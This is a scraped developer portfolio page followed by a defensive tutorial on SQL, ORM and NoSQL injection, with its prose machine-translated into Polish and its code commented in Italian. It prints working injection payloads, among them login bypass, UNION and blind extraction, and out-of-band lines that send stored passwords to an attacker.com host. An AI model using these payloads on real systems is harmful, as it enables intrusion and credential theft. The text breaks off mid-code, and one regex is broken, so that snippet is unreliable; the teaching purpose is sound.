Cześć! Jestem

Federico Calò

Sviluppatore Software | Divulgatore Tecnico

Creo applicazioni web moderne e strumenti digitali personalizzati per aiutare le attività a crescere attraverso l'innovazione tecnologica. La mia passione è unire informatica ed economia per generare valore reale.

Skontaktuj się

O Mnie

La mia passione per l'informatica è nata tra i banchi dell'Istituto Tecnico Commerciale di Maglie, dove ho scoperto il potere della programmazione e il fascino di creare soluzioni digitali. Fin da subito, ho capito che l'informatica non era solo codice, ma uno strumento straordinario per trasformare idee in realtà.

Durante gli studi superiori in Sistemi Informativi Aziendali, ho iniziato a intrecciare informatica ed economia, comprendendo come la tecnologia possa essere il motore della crescita per qualsiasi attività. Questa visione mi ha accompagnato all'Università degli Studi di Bari, dove ho conseguito la Laurea in Informatica, approfondendo le mie competenze tecniche e la mia passione per lo sviluppo software.

Oggi metto questa esperienza al servizio di imprese, professionisti e startup, creando soluzioni digitali su misura che automatizzano processi, ottimizzano risorse e aprono nuove opportunità di business. Perché la vera innovazione inizia quando la tecnologia incontra le esigenze reali delle persone.

Moje Umiejętności

Analisi Dati & Modelli Previsionali

Trasformo i dati in insights strategici con analisi approfondite e modelli predittivi per decisioni informate

Automatyzacja Procesów

Creo strumenti personalizzati che automatizzano operazioni ripetitive e liberano tempo per attività a valore aggiunto

Systemy Na Zamówienie

Sviluppo sistemi software su misura, dalle integrazioni tra piattaforme alle dashboard personalizzate

const federico = {
  nome: "Federico Calò",
  ruolo: "Sviluppatore Software",
  città: "Bari, Italia",
  missione: "Aiutare attraverso l'informatica",
  passioni: [
    "Codice Pulito",
    "Innovazione",
    "Crescita Continua"
  ]
};

Moja Misja

Credo fermamente che l'informatica sia lo strumento più potente per trasformare le idee in realtà e migliorare la vita delle persone.

Demokratyzacja Technologii

La mia missione è rendere l'informatica accessibile a tutti: dalle piccole imprese locali alle startup innovative, fino ai professionisti che vogliono digitalizzare la propria attività. Ogni realtà merita di sfruttare le potenzialità del digitale.

Łączenie IT i Biznesu

Non è solo questione di scrivere codice: è capire come la tecnologia possa generare valore reale. Intrecciando competenze informatiche e visione economica, aiuto le attività a crescere, ottimizzare processi e raggiungere nuovi traguardi di efficienza e redditività.

Tworzenie Rozwiązań na Miarę

Ogni attività è unica, e così devono esserlo le soluzioni. Sviluppo strumenti personalizzati che rispondono alle esigenze specifiche di ciascun cliente, automatizzando processi ripetitivi e liberando tempo per ciò che conta davvero: far crescere il business.

Przekształć Swój Biznes z Technologią

Che tu gestisca un negozio, uno studio professionale o un'azienda, posso aiutarti a sfruttare le potenzialità dell'informatica per lavorare meglio, più velocemente e in modo più intelligente.

Porozmawiajmy →

Unisciti alla Community

Entra nella community di sviluppatori dove discutiamo di software, AI, architettura e DevOps. Condividi idee, fai domande e cresci insieme a noi.

Canale

FC Dev Blog

Ricevi notifiche su nuovi articoli, serie complete, tips settimanali e tool in evidenza. Contenuti bilingui IT/EN direttamente nel tuo Telegram.

Nuovi articoli appena pubblicati
Tips e code snippets settimanali
Sondaggi sugli argomenti futuri

Iscriviti al Canale

Gruppo

FC Dev Community

Una community bilingue IT/EN per sviluppatori. Discussioni, Q&A, aiuto reciproco e networking con altri professionisti del settore.

Discussioni su articoli e tecnologie
Help coding e code review
Opportunità di lavoro e collaborazione

Unisciti al Gruppo

Topic di Discussione

Visualizza

Master SQL

RoadMap.sh

Novembre 2024

Visualizza

Oracle Certified Foundations Associate

Oracle

Ottobre 2024

Visualizza

People Leadership Credential

Connect

Settembre 2024

Linguaggi & Tecnologie

Java

Python

JavaScript

Angular

React

TypeScript

SQL

PHP

CSS/SCSS

Node.js

Docker

Git

💼

12/2024 - Presente

Custom Software Engineering Analyst

Accenture

Bari, Puglia, Italia · Ibrida Analisi e sviluppo di sistemi informatici attraverso l'utilizzo di Java e Quarkus in Health and Public Sector. Formazione continua su tecnologie moderne per la creazione di soluzioni software personalizzate ed efficienti e sugli agenti.

💼

06/2022 - 12/2024

Analista software e Back End Developer Associate Consultant

Links Management and Technology SpA

Esperienza nell'analisi di sistemi software as-is e flussi ETL utilizzando PowerCenter. Formazione completata su Spring Boot per lo sviluppo di applicazioni backend moderne e scalabili. Sviluppatore Backend specializzato in Spring Boot, con esperienza in progettazione di database, analisi, sviluppo e testing dei task assegnati.

💼

02/2021 - 10/2021

Programmatore software

Adesso.it (prima era WebScience srl)

Esperienza nell'analisi AS-IS e TO-BE, evoluzioni SEO ed evoluzioni website per migliorare le performance e l'engagement degli utenti.

🎓

2018 - 2025

Laurea in Informatica

Università degli Studi di Bari Aldo Moro

Bachelor's degree in Computer Science, focusing on software engineering, algorithms, and modern development practices.

📚

2013 - 2018

Diploma - Sistemi Informativi Aziendali

Istituto Tecnico Commerciale di Maglie

Technical diploma specializing in Business Information Systems, combining IT knowledge with business management.

Skontaktuj się

Masz projekt? Porozmawiajmy! Wypełnij formularz, a odpowiem wkrótce.

* Campi obbligatori. I tuoi dati saranno utilizzati solo per rispondere alla tua richiesta.

03 — Wstrzykiwanie SQL i sprawdzanie poprawności danych wejściowych: Bezpieczeństwo zaplecza

Wstrzykiwanie SQL to jedna z najstarszych i najniebezpieczniejszych luk w zabezpieczeniach sieci. Po raz pierwszy udokumentowano to pod koniec lat 90. XX w., a dziś nadal znajduje się ono w centrum katastrofalnych w skutkach naruszeń danych: według Verizon DBIR w 2024 r. zastrzyki SQL i inne ataki na aplikacje internetowe spowodowały 26% wszystkich naruszeń danych. Więcej można się spodziewać w 2025 roku 2600 CVE związanych z iniekcją SQL, w porównaniu z 2400 w 2024 r.

Nie chodzi tylko o klasyczne zapytania SQL. Dziś zagrożenia rozciągają się na Zastrzyk ORM na TypeORM i Prisma, pod adresem Wstrzyknięcie NoSQL na MongoDB oraz ataki drugiej generacji wykorzystujące dane już znajdujące się w bazie danych. W tym artykule przeanalizowano każdy wariant z podatnym na ataki i bezpiecznym kodem w Node.js, Pythonie i Javie oraz przedstawiono kompleksową strategię obronną dla backendu.

Czego się nauczysz

Pełna anatomia wstrzyknięcia SQL: UNION, ślepa, oparta na czasie, oparta na błędach, poza pasmem
Wstrzykiwanie SQL drugiego rzędu: jak to działa i dlaczego wymyka się powierzchownym kontrolom
Wstrzykiwanie ORM na TypeORM i Prisma z praktycznymi przykładami
Wstrzyknięcie NoSQL do MongoDB z operatorami takimi jak $ne i $regex
Przygotowane zestawienia i sparametryzowane zapytania w Node.js, Python i Java
Walidacja danych wejściowych za pomocą Zoda (Node.js), Pydantic (Python) i Walidacji Bean (Java)
Hartowanie baz danych i zasada najmniejszych uprawnień
Jak używać SQLMap do testowania aplikacji
Prawdziwe studia przypadków: Transfer MOVEit, TSA FlyCASS, ResumeLooters

Anatomia iniekcji SQL

Wstrzyknięcie SQL ma miejsce, gdy Nieprawidłowe dane wprowadzone przez użytkownika są łączone bezpośrednio w zapytaniu SQL, umożliwiając atakującemu modyfikację logiki samego zapytania. Problem podstawowy, architektoniczny: traktowanie danych jako kodu wykonywalnego.

Rozważmy najprostszy przypadek, stronę logowania w Node.js, która konstruuje zapytanie z konkatenacją ciągów:

// CODICE VULNERABILE - Node.js con mysql2
const express = require('express');
const mysql = require('mysql2/promise');

app.post('/login', async (req, res) => {
  const { username, password } = req.body;

  // VULNERABILE: concatenazione diretta di input utente
  const query = `SELECT * FROM users
    WHERE username = '${username}'
    AND password = '${password}'`;

  const [rows] = await db.execute(query);

  if (rows.length > 0) {
    res.json({ success: true, user: rows[0] });
  } else {
    res.status(401).json({ error: 'Credenziali non valide' });
  }
});

// ATTACCO: username = "admin' --"
// Query risultante:
// SELECT * FROM users
//   WHERE username = 'admin' --' AND password = '...'
// Il -- commenta il resto: accesso garantito senza password!

Pięć typów iniekcji SQL

1. Klasyczny / oparty na UNII

Atakujący wykorzystuje operatora UNION aby dodać drugie zapytanie do wyników pierwszego. Wymaga, aby odpowiedź aplikacji zawierała dane zapytania:

-- Payload UNION-based: estrae utenti dalla tabella users
-- Input: id = 1 UNION SELECT username, password, NULL FROM users --

-- Query originale:
SELECT product_name, price, description FROM products WHERE id = 1

-- Query iniettata:
SELECT product_name, price, description FROM products WHERE id = 1
UNION SELECT username, password, NULL FROM users --

-- Prerequisito: stesso numero di colonne, tipi compatibili

2. Ślepe oparte na wartościach logicznych

Aplikacja nie pokazuje danych z bazy danych, ale zmienia zachowanie (np. pokazuje lub ukrywa treść) w oparciu o prawdziwość/fałsz wprowadzonego warunku. Osoba atakująca wyciąga informacje krok po kroku:

-- Payload boolean-based: verifica se la prima lettera dell'utente e 'a'
-- Se la pagina risponde normalmente: condizione vera
-- Se la pagina e vuota: condizione falsa

-- Vero (pagina normale):
GET /product?id=1 AND SUBSTRING((SELECT username FROM users LIMIT 1),1,1)='a'

-- Falso (pagina vuota):
GET /product?id=1 AND SUBSTRING((SELECT username FROM users LIMIT 1),1,1)='b'

-- Automatizzabile con sqlmap o script custom per estrarre dati carattere per carattere

3. Oślepienie oparte na czasie

Gdy aplikacja nie zmienia odpowiedzi w żaden widoczny sposób, atakujący wykorzystuje funkcje powodujące opóźnienia w bazie danych, aby wywnioskować informacje z czasu odpowiedzi:

-- MySQL: SLEEP() per estrarre informazioni dal timing
-- Se la risposta impiega 5 secondi: condizione vera
-- Se risponde subito: condizione falsa

-- Verifica se il database si chiama 'production':
GET /product?id=1 AND IF(
  (SELECT database())='production',
  SLEEP(5),
  0
) --

-- PostgreSQL equivalente con pg_sleep():
-- id=1; SELECT CASE WHEN (username='admin') THEN pg_sleep(5) ELSE pg_sleep(0) END FROM users --

-- Microsoft SQL Server:
-- id=1; IF (SELECT COUNT(*) FROM users WHERE username='admin')>0 WAITFOR DELAY '0:0:5'--

4. Oparte na błędach

Osoba atakująca zmusza bazę danych do wygenerowania komunikatów o błędach zawierających wyodrębnione dane. Działa to, gdy aplikacja pokazuje użytkownikowi błędy bazy danych (częste błędne konfiguracje w środowiskach programistycznych słabo skonfigurowanych do produkcji):

-- MySQL error-based: extractvalue() genera un errore con il valore estratto
-- id=1 AND extractvalue(1, concat(0x7e, (SELECT database())))

-- Errore restituito all'utente:
-- ERROR 1105 (HY000): XPATH syntax error: '~production_db'
-- L'attaccante ottiene il nome del database dall'errore!

-- PostgreSQL: cast di tipo per forzare errore
-- id=1 AND cast((SELECT version()) as int)

-- Error: invalid input syntax for type integer:
-- "PostgreSQL 15.2 on x86_64-pc-linux-gnu"

5. Poza pasmem (OOB)

Zaawansowana technika eksfiltracji danych alternatywnymi kanałami (wyszukiwanie DNS, żądanie HTTP), a nie zwykłą odpowiedzią HTTP. Przydatne, gdy kanały w paśmie są zablokowane:

-- MySQL OOB via DNS (richiede FILE privilege e outbound DNS):
-- id=1 AND load_file(concat('\\\\', (SELECT password FROM users LIMIT 1), '.attacker.com\\x'))

-- Microsoft SQL Server OOB via HTTP (xp_dirtree o sp_makewebtask):
-- id=1; EXEC master..xp_dirtree '\\attacker.com\' + (SELECT TOP 1 password FROM users) + '\share'

-- L'attaccante vede la richiesta nei log DNS di attacker.com:
-- admin:5f4dcc3b5aa765d61d8327deb882cf99.attacker.com

Wstrzykiwanie SQL drugiego rzędu: ukryte zagrożenie

La Wstrzyknięcie SQL drugiego rzędu (lub przechowywany zastrzyk SQL) to jedna z najbardziej podstępnych luk w zabezpieczeniach, ponieważ wymyka się standardowym kontrolom bezpieczeństwa. Ładunek nie jest wykonywany natychmiast po wstawieniu, ale tak jest zapisane w bazie danych i wtedy pobrane i wykorzystane w kolejnym zapytaniu bez odpowiedniej sanitacji.

Ten scenariusz jest szczególnie niebezpieczny, ponieważ: kod wstawiania może być poprawny i bezpieczny, ale kod odczytu i użycia jest podatny na ataki. Powierzchniowe testy penetracyjne często tego nie zauważają.

// SCENARIO: registrazione utente e cambio password

// FASE 1 - Registrazione (apparentemente sicura con prepared statement)
app.post('/register', async (req, res) => {
  const { username, password } = req.body;

  // Usa prepared statement - sembra sicuro!
  await db.execute(
    'INSERT INTO users (username, password) VALUES (?, ?)',
    [username, hash(password)]
  );
  // L'attaccante si registra con username: admin'--
  // Salvato correttamente nel DB come stringa: admin'--
});

// FASE 2 - Cambio password (VULNERABILE: costruisce query con dato dal DB)
app.post('/change-password', async (req, res) => {
  const userId = req.session.userId;

  // Recupera username dal DB (sembra "sicuro" perchè viene dal nostro DB)
  const [userRows] = await db.execute(
    'SELECT username FROM users WHERE id = ?',
    [userId]
  );
  const username = userRows[0].username; // = "admin'--"

  const { newPassword } = req.body;

  // VULNERABILE: concatena username recuperato dal DB
  const query = `UPDATE users SET password = '${hash(newPassword)}'
    WHERE username = '${username}'`;
  // Query risultante:
  // UPDATE users SET password = 'newhash' WHERE username = 'admin'--'
  // Aggiorna la password dell'admin, non dell'attaccante!

  await db.execute(query);
});

// SOLUZIONE: usa parameterized query ANCHE quando i dati vengono dal DB
app.post('/change-password-safe', async (req, res) => {
  const userId = req.session.userId;
  const [userRows] = await db.execute(
    'SELECT username FROM users WHERE id = ?',
    [userId]
  );
  const username = userRows[0].username;
  const { newPassword } = req.body;

  // SICURO: prepared statement anche per dati interni
  await db.execute(
    'UPDATE users SET password = ? WHERE username = ?',
    [hash(newPassword), username]
  );
});

Złota zasada wstrzykiwania drugiego rzędu

ZAWSZE traktuj dane pochodzące z bazy danych jako niezaufane, zwłaszcza jeśli zostały pierwotnie opublikowane przez użytkowników. To, że coś pochodzi z Twojej bazy danych, nie oznacza automatycznie, że użycie go w zapytaniu jest bezpieczne. Zawsze używaj zapytań sparametryzowanych, niezależnie od źródła danych.

Zapytania sparametryzowane: główna obrona

I przygotowane wypowiedzi (lub zapytania sparametryzowane) są najskuteczniejszym środkiem zaradczym przeciwko iniekcji SQL. Zasada jest prosta: struktura zapytania przesyłana jest do bazy danych osobno z danych, w dwóch odrębnych fazach. Baza danych kompiluje plan wykonania przed otrzymaniem danych, co w związku z tym nie może zmienić logiki zapytania.

Node.js z mysql2

// SICURO: parameterized queries con mysql2
const mysql = require('mysql2/promise');

const pool = mysql.createPool({
  host: process.env.DB_HOST,
  user: process.env.DB_USER,
  password: process.env.DB_PASSWORD,
  database: process.env.DB_NAME,
  // Opzione di sicurezza: disabilita multiple statements
  multipleStatements: false,
});

// Login sicuro
async function loginUser(username, password) {
  // Il ? e un placeholder: mysql2 gestisce l'escaping automaticamente
  const [rows] = await pool.execute(
    'SELECT id, username, role FROM users WHERE username = ? AND password = ?',
    [username, hashPassword(password)]
  );
  return rows[0] || null;
}

// Ricerca con LIKE sicura
async function searchProducts(searchTerm, category, limit = 20) {
  // Anche i wildcard % devono essere nel parametro, non nella query
  const likeTerm = `%${searchTerm}%`;
  const [rows] = await pool.execute(
    `SELECT id, name, price FROM products
     WHERE name LIKE ? AND category = ?
     LIMIT ?`,
    [likeTerm, category, limit]
  );
  return rows;
}

// Inserimento sicuro con validazione
async function createUser(userData) {
  const { username, email, password, role = 'user' } = userData;

  // Whitelist per il campo role (non parametrizzabile come identifier)
  const allowedRoles = ['user', 'moderator'];
  if (!allowedRoles.includes(role)) {
    throw new Error('Ruolo non valido');
  }

  const [result] = await pool.execute(
    'INSERT INTO users (username, email, password_hash, role) VALUES (?, ?, ?, ?)',
    [username, email, hashPassword(password), role]
  );
  return result.insertId;
}

Python z psycopg2 (PostgreSQL)

# SICURO: parameterized queries con psycopg2
import psycopg2
import psycopg2.extras
from contextlib import contextmanager

@contextmanager
def get_db_connection():
    conn = psycopg2.connect(
        host=os.environ['DB_HOST'],
        database=os.environ['DB_NAME'],
        user=os.environ['DB_USER'],
        password=os.environ['DB_PASSWORD']
    )
    try:
        yield conn
    finally:
        conn.close()

def get_user_by_id(user_id: int) -> dict | None:
    """
    Usa %s come placeholder (NON f-string o format()).
    psycopg2 gestisce l'escaping dei parametri in modo sicuro.
    """
    with get_db_connection() as conn:
        with conn.cursor(cursor_factory=psycopg2.extras.RealDictCursor) as cur:
            # Corretto: placeholder %s con tupla di parametri
            cur.execute(
                "SELECT id, username, email, role FROM users WHERE id = %s",
                (user_id,)  # Nota la virgola: deve essere una tupla
            )
            return cur.fetchone()

def search_users(filters: dict) -> list[dict]:
    """
    Costruzione dinamica sicura di query con parametri multipli.
    Evita di costruire SQL dinamico con concatenazione.
    """
    conditions = []
    params = []

    if 'username' in filters:
        conditions.append("username ILIKE %s")
        params.append(f"%{filters['username']}%")

    if 'role' in filters:
        # Whitelist per valori enumerati
        allowed_roles = {'user', 'admin', 'moderator'}
        if filters['role'] not in allowed_roles:
            raise ValueError(f"Ruolo non valido: {filters['role']}")
        conditions.append("role = %s")
        params.append(filters['role'])

    where_clause = " AND ".join(conditions) if conditions else "TRUE"
    query = f"SELECT id, username, email, role FROM users WHERE {where_clause}"

    with get_db_connection() as conn:
        with conn.cursor(cursor_factory=psycopg2.extras.RealDictCursor) as cur:
            cur.execute(query, params)
            return cur.fetchall()

# SBAGLIATO - Non fare mai questo:
# cur.execute(f"SELECT * FROM users WHERE id = {user_id}")  # f-string = vulnerabile
# cur.execute("SELECT * FROM users WHERE id = " + str(user_id))  # concatenazione = vulnerabile
# cur.execute("SELECT * FROM users WHERE id = %s" % user_id)  # % formatting = vulnerabile

Java z preparowaną instrukcją JDBC

// SICURO: PreparedStatement con JDBC in Java
import java.sql.*;
import java.util.Optional;

public class UserRepository {

    private final DataSource dataSource;

    public UserRepository(DataSource dataSource) {
        this.dataSource = dataSource;
    }

    // SICURO: PreparedStatement parametrizzato
    public Optional<User> findByUsername(String username) {
        String sql = "SELECT id, username, email, role FROM users WHERE username = ?";

        try (Connection conn = dataSource.getConnection();
             PreparedStatement stmt = conn.prepareStatement(sql)) {

            stmt.setString(1, username);  // Parametro 1-indexed
            ResultSet rs = stmt.executeQuery();

            if (rs.next()) {
                return Optional.of(new User(
                    rs.getLong("id"),
                    rs.getString("username"),
                    rs.getString("email"),
                    rs.getString("role")
                ));
            }
            return Optional.empty();
        } catch (SQLException e) {
            throw new DatabaseException("Errore nella ricerca utente", e);
        }
    }

    // Inserimento sicuro con transazione
    public long createUser(String username, String email, String passwordHash) {
        String sql = "INSERT INTO users (username, email, password_hash, created_at) " +
                     "VALUES (?, ?, ?, NOW())";

        try (Connection conn = dataSource.getConnection()) {
            conn.setAutoCommit(false);

            try (PreparedStatement stmt = conn.prepareStatement(
                    sql, Statement.RETURN_GENERATED_KEYS)) {

                stmt.setString(1, username);
                stmt.setString(2, email);
                stmt.setString(3, passwordHash);
                stmt.executeUpdate();

                conn.commit();

                ResultSet keys = stmt.getGeneratedKeys();
                if (keys.next()) {
                    return keys.getLong(1);
                }
                throw new DatabaseException("Impossibile ottenere ID generato");
            } catch (SQLException e) {
                conn.rollback();
                throw new DatabaseException("Errore creazione utente", e);
            }
        } catch (SQLException e) {
            throw new DatabaseException("Errore connessione database", e);
        }
    }

    // SBAGLIATO - Statement.execute() con concatenazione:
    // String sql = "SELECT * FROM users WHERE username = '" + username + "'";
    // stmt.execute(sql);  // MAI fare questo!
}

Wstrzykiwanie ORM: gdy „bezpieczne” to za mało

Wielu programistów błędnie uważa, że użycie ORM (Object-Relational Mapper) automatycznie eliminuje ryzyko wstrzyknięcia SQL. W rzeczywistości, według badania z 2025 r., Ponad 30% aplikacji korzystających z ORM nadal zawiera luki w zabezpieczeniach polegające na wstrzykiwaniu SQL z powodu nieprawidłowych wzorców użytkowania. Przyjrzyjmy się najczęstszym przypadkom.

TypeORM: Surowe zapytania i QueryBuilder

// TypeORM - Pattern VULNERABILI vs SICURI

import { DataSource, Repository } from 'typeorm';
import { User } from './entities/User';

// VULNERABILE 1: query() con interpolazione di stringa
async function findUserVulnerable(username: string) {
  const result = await dataSource.query(
    `SELECT * FROM users WHERE username = '${username}'`
    // Se username = "admin' OR '1'='1", bypass immediato!
  );
  return result;
}

// SICURO 1: query() con parametri posizionali
async function findUserSafe(username: string) {
  const result = await dataSource.query(
    'SELECT id, username, email FROM users WHERE username = $1',
    [username]  // Parametri come array separato
  );
  return result;
}

// VULNERABILE 2: QueryBuilder con where() e interpolazione
async function searchUserVulnerable(role: string, search: string) {
  return await dataSource
    .createQueryBuilder(User, 'user')
    .where(`user.role = '${role}' AND user.username LIKE '%${search}%'`)
    // Interpolazione diretta = SQL injection!
    .getMany();
}

// SICURO 2: QueryBuilder con parametri nominati
async function searchUserSafe(role: string, search: string) {
  // Whitelist per campi enumerati come role
  const allowedRoles = ['user', 'admin', 'moderator'] as const;
  if (!allowedRoles.includes(role as any)) {
    throw new Error('Ruolo non valido');
  }

  return await dataSource
    .createQueryBuilder(User, 'user')
    .where('user.role = :role AND user.username LIKE :search', {
      role,                    // Parametro nominato :role
      search: `%${search}%`  // Il % viene nel parametro, non nella query
    })
    .select(['user.id', 'user.username', 'user.email'])
    .getMany();
}

// SICURO 3: Repository API (il modo più sicuro con TypeORM)
async function findUsersByRoleSafe(
  userRepository: Repository<User>,
  role: string
) {
  return await userRepository.findBy({ role });
  // TypeORM genera automaticamente query parametrizzate
}

// SICURO 4: find() con condizioni complesse
async function findActiveUsersSafe(
  userRepository: Repository<User>
) {
  return await userRepository.find({
    where: {
      isActive: true,
      role: 'user'
    },
    select: {
      id: true,
      username: true,
      email: true
    },
    take: 100  // Limita i risultati
  });
}

Pryzmat: Sprawa $queryRaw

Prisma jest ogólnie uważana za bezpieczną dla standardowych zapytań, ale metod $queryRaw e $executeRaw wymagają szczególnej uwagi. Badania z 2025 roku wykazały, że Prisma może być podatna na ataki oparte na czasie poprzez operatory JSON i funkcje bazy danych.

// Prisma - Pattern VULNERABILI vs SICURI

import { PrismaClient } from '@prisma/client';

const prisma = new PrismaClient();

// VULNERABILE: $queryRaw con template literal non sicuro
async function getUserVulnerable(userId: string) {
  // MAI usare $queryRawUnsafe con input utente!
  const result = await prisma.$queryRawUnsafe(
    `SELECT * FROM users WHERE id = ${userId}`
    // userId = "1 OR 1=1" bypassa il filtro!
  );
  return result;
}

// SICURO 1: $queryRaw con tagged template literals
// Prisma parametrizza automaticamente le interpolazioni nel tagged template
async function getUserSafe(userId: number) {
  // Nota: usa Prisma.sql template tag, NON stringa normale
  const result = await prisma.$queryRaw`
    SELECT id, username, email FROM users WHERE id = ${userId}
  `;
  // Prisma converte ${userId} in un parametro preparato automaticamente
  return result;
}

// SICURO 2: Usa l'API standard di Prisma quando possibile
async function getUserWithOrders(userId: number) {
  return await prisma.user.findUnique({
    where: { id: userId },
    select: {
      id: true,
      username: true,
      email: true,
      orders: {
        where: { status: 'active' },
        take: 10
      }
    }
  });
  // Completamente sicuro: Prisma genera prepared statements
}

// ATTENZIONE: Prisma findMany con where esposto all'utente
// VULNERABILE: ORM Leak - espone troppi dati
async function searchUsersVulnerable(userFilter: any) {
  return await prisma.user.findMany({
    where: userFilter,  // L'utente controlla il where = ORM Leak!
    // Un attaccante può usare: { password: { startsWith: 'a' } }
    // Per estrarre la password carattere per carattere (timing attack)
  });
}

// SICURO: schema di validazione strict per i filtri
import { z } from 'zod';

const UserSearchSchema = z.object({
  username: z.string().max(50).optional(),
  email: z.string().email().optional(),
  role: z.enum(['user', 'moderator']).optional(),
});

async function searchUsersSafe(rawFilter: unknown) {
  // Valida e trasforma il filtro con schema strict
  const validFilter = UserSearchSchema.parse(rawFilter);

  return await prisma.user.findMany({
    where: validFilter,  // Solo campi consentiti e validati
    select: {          // Seleziona esplicitamente i campi
      id: true,
      username: true,
      email: true,
      role: true,
    },
    take: 50,
  });
}

Wstrzykiwanie NoSQL: MongoDB i niebezpieczni operatorzy

Aplikacje korzystające z baz danych NoSQL, takich jak MongoDB, nie są odporne na zastrzyki. Ataki NoSQL wykorzystują operatory zapytań bazy danych (np $ne, $gt, $regex), aby zmienić logikę zapytania. Typowym wektorem ataku jest zniekształcona treść JSON w żądaniu HTTP.

// MongoDB con Mongoose - VULNERABILE
const express = require('express');
const User = require('./models/User');

// VULNERABILE: usa direttamente req.body come query MongoDB
app.post('/login', async (req, res) => {
  const { username, password } = req.body;

  // Se il body e: { "username": { "$ne": null }, "password": { "$ne": null } }
  // La query diventa: WHERE username != null AND password != null
  // Ritorna il PRIMO utente nel DB, bypass completo!
  const user = await User.findOne({ username, password });

  if (user) {
    res.json({ token: generateToken(user) });
  } else {
    res.status(401).json({ error: 'Non autorizzato' });
  }
});

// Payload di attacco (come JSON body):
// {
//   "username": { "$ne": null },
//   "password": { "$ne": null }
// }

// Altri payload comuni:
// { "username": { "$regex": ".*" } }    -- match qualsiasi username
// { "password": { "$gt": "" } }          -- password > stringa vuota (sempre vero)
// { "username": { "$in": ["admin", "root", "administrator"] } }

// MongoDB con Mongoose - SICURO

const express = require('express');
const mongoose = require('mongoose');
const mongoSanitize = require('express-mongo-sanitize');
const { z } = require('zod');
const bcrypt = require('bcrypt');

// 1. Middleware globale di sanitizzazione
app.use(mongoSanitize({
  replaceWith: '_',  // Sostituisce $ con _ negli operatori
  onSanitizeError(req, res) {
    res.status(400).json({ error: 'Input non valido' });
  }
}));

// 2. Schema Zod per validazione strict del tipo
const LoginSchema = z.object({
  username: z.string().min(3).max(50).regex(/^[a-zA-Z0-9_]+$/),
  password: z.string().min(8).max(128),
});

// SICURO: validazione + hashing password + nessuna query con password in chiaro
app.post('/login', async (req, res) => {
  try {
    // Valida il tipo: username e password DEVONO essere stringhe
    const { username, password } = LoginSchema.parse(req.body);

    // Cerca per username (stringa validata, non oggetto)
    const user = await User.findOne({ username }).select('+password');

    if (!user) {
      // Tempo di risposta costante per prevenire timing attacks
      await bcrypt.compare(password, '$2b$10$placeholder.hash.here.for.timing');
      return res.status(401).json({ error: 'Credenziali non valide' });
    }

    // Verifica password con bcrypt (non in chiaro nel DB)
    const isValid = await bcrypt.compare(password, user.password);
    if (!isValid) {
      return res.status(401).json({ error: 'Credenziali non valide' });
    }

    res.json({ token: generateToken(user) });
  } catch (error) {
    if (error instanceof z.ZodError) {
      return res.status(400).json({ error: 'Formato input non valido' });
    }
    // Non esporre dettagli dell'errore interno
    res.status(500).json({ error: 'Errore del server' });
  }
});

// 3. Mongoose schema con strict mode (default: true)
const userSchema = new mongoose.Schema({
  username: { type: String, required: true, unique: true },
  email: { type: String, required: true },
  password: { type: String, required: true, select: false },
  role: { type: String, enum: ['user', 'admin', 'moderator'], default: 'user' }
}, {
  strict: true,  // Ignora campi non definiti nello schema
  // sanitizeFilter: true  // Mongoose 6+: sanitizza automaticamente i query operator
});

// 4. Usa sanitizeFilter per query che accettano filtri utente
const UserModel = mongoose.model('User', userSchema);

async function findUsersByFilter(rawFilter) {
  // sanitizeFilter: true nel modello previene ORM injection
  // oppure usa questo approccio esplicito:
  return await UserModel.find(rawFilter).sanitizeFilter(true);
}

Walidacja danych wejściowych: pierwsza linia obrony

Zapytania parametryczne chronią przed iniekcją SQL, alewalidacja danych wejściowych jest pierwszą barierą obronną i znacznie zmniejsza powierzchnię ataku. Solidna walidacja jest zgodna z zasadą lista dozwolonych (określ, co jest dozwolone), a nie listę zablokowanych (określ, co jest zabronione).

Zod dla Node.js/TypeScript

// Input validation con Zod - Node.js/TypeScript
import { z } from 'zod';

// Schema riutilizzabile per parametri comuni
const IdSchema = z.coerce.number().int().positive().max(2147483647);

const PaginationSchema = z.object({
  page: z.coerce.number().int().min(1).default(1),
  limit: z.coerce.number().int().min(1).max(100).default(20),
  sortBy: z.enum(['created_at', 'username', 'email']).default('created_at'),
  sortOrder: z.enum(['asc', 'desc']).default('desc'),
});

// Schema per creazione utente
const CreateUserSchema = z.object({
  username: z
    .string()
    .min(3, 'Username troppo corto')
    .max(50, 'Username troppo lungo')
    .regex(/^[a-zA-Z0-9_-]+$/, 'Caratteri non consentiti nell\'username'),
  email: z
    .string()
    .email('Formato email non valido')
    .max(255),
  password: z
    .string()
    .min(8, 'Password troppo corta')
    .max(128, 'Password troppo lunga')
    .regex(
      /^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[@$!%*?&])/,
      'La password deve contenere maiuscole, minuscole, numeri e caratteri speciali'
    ),
  role: z.enum(['user', 'moderator']).default('user'),
});

// Middleware di validazione generico per Express
function validateBody<T>(schema: z.ZodSchema<T>) {
  return (req: Request, res: Response, next: NextFunction) => {
    const result = schema.safeParse(req.body);
    if (!result.success) {
      return res.status(400).json({
        error: 'Dati non validi',
        details: result.error.issues.map(issue => ({
          field: issue.path.join('.'),
          message: issue.message,
        })),
      });
    }
    req.body = result.data;  // Sostituisce con dati validati e tipizzati
    next();
  };
}

function validateQuery<T>(schema: z.ZodSchema<T>) {
  return (req: Request, res: Response, next: NextFunction) => {
    const result = schema.safeParse(req.query);
    if (!result.success) {
      return res.status(400).json({
        error: 'Parametri query non validi',
        details: result.error.issues,
      });
    }
    req.validatedQuery = result.data;
    next();
  };
}

// Uso nei router
app.post('/api/users',
  validateBody(CreateUserSchema),
  async (req, res) => {
    // req.body e ora tipizzato e validato
    const user = await createUser(req.body);
    res.status(201).json({ id: user.id });
  }
);

app.get('/api/products',
  validateQuery(PaginationSchema),
  async (req, res) => {
    const { page, limit, sortBy, sortOrder } = req.validatedQuery;
    const products = await getProducts(page, limit, sortBy, sortOrder);
    res.json(products);
  }
);

Pydantic dla Pythona/FastAPI

# Input validation con Pydantic v2 - Python/FastAPI
from pydantic import BaseModel, Field, field_validator, EmailStr
from typing import Literal
from enum import Enum
import re

class UserRole(str, Enum):
    user = "user"
    moderator = "moderator"
    admin = "admin"

class CreateUserRequest(BaseModel):
    username: str = Field(
        min_length=3,
        max_length=50,
        description="Username alfanumerico"
    )
    email: EmailStr
    password: str = Field(min_length=8, max_length=128)
    role: UserRole = UserRole.user

    @field_validator('username')
    @classmethod
    def username_alphanumeric(cls, v: str) -> str:
        if not re.match(r'^[a-zA-Z0-9_-]+, v):
            raise ValueError('Username deve contenere solo lettere, numeri, _ e -')
        return v.lower()

    @field_validator('password')
    @classmethod
    def password_strength(cls, v: str) -> str:
